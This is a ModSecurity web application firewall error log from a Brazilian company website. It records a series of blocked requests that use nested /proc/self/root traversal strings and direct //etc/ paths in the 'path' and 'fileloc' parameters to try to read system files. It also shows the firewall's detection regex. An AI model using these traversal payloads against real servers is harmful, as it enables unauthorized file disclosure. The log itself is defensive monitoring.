[Wed Mar 18 03:53:37.035082 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.241.31:49828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpL8SmAPhZkrhU8w4ktjgAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:53:56.255303 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:53504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMBNa6ubjKNq_cu4ZVsQAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:54:18.704504 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.241.31:55792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMGkzinOy1jxa1j4fSTwAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:54:29.714475 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.241.31:53312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMJSmAPhZkrhU8w4ktogAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:54:50.055087 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:48934] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMOtY0UrI5A3LftIxRWwAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:54:57.981508 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:49412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMQPu8EFLIOrSqIpvGogAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:54:59.703257 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:35628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMQ9Y0UrI5A3LftIxRXQAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:55:23.469853 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:35640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMW9Y0UrI5A3LftIxReAAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:55:24.856099 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:58364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMXOw_le52K8_3pV2fyQAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:55:28.275846 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:58376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMYNa6ubjKNq_cu4ZV8gAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:55:32.742523 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:49926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMZCmAPhZkrhU8w4ktswAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:55:33.997458 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:49930] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMZdY0UrI5A3LftIxRfgAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:55:55.488050 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:39354] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMe8df6f5d65gmYZSQ5QAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:56:56.706355 2026] [:error] [pid 26799:tid 140411599251200] [client 216.73.216.191:49270] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMuNa6ubjKNq_cu4ZWDwAAA1E"]
[Wed Mar 18 03:57:04.676244 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:47478] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpMv9Y0UrI5A3LftIxSSAAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:57:42.373434 2026] [:error] [pid 11816:tid 140411590858496] [client 216.73.216.191:55743] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpM5uw_le52K8_3pV2gDgAAAhI"]
[Wed Mar 18 03:57:55.868117 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:37978] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpM8_u8EFLIOrSqIpvHFAAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:57:58.286447 2026] [:error] [pid 26799:tid 140411666392832] [client 216.73.216.191:28659] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpM9da6ubjKNq_cu4ZWWAAAA0k"]
[Wed Mar 18 03:58:05.236031 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.243.128:40814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpM_UzinOy1jxa1j4fStgAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:58:05.521680 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.241.31:58628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpM_SmAPhZkrhU8w4kuGAAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:58:09.967387 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:36060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpNAeyqAr6etmhZHNp4cwAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:59:03.028006 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:38178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpNN-oXxyEfFpUF8f8tfQAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:59:09.203055 2026] [:error] [pid 29882:tid 140411624429312] [client 216.73.216.191:27836] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpNPUzinOy1jxa1j4fSzgAAAQ4"]
[Wed Mar 18 03:59:09.407440 2026] [:error] [pid 19507:tid 140411540502272] [client 216.73.216.191:62294] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpNPdY0UrI5A3LftIxSjAAAAZg"]
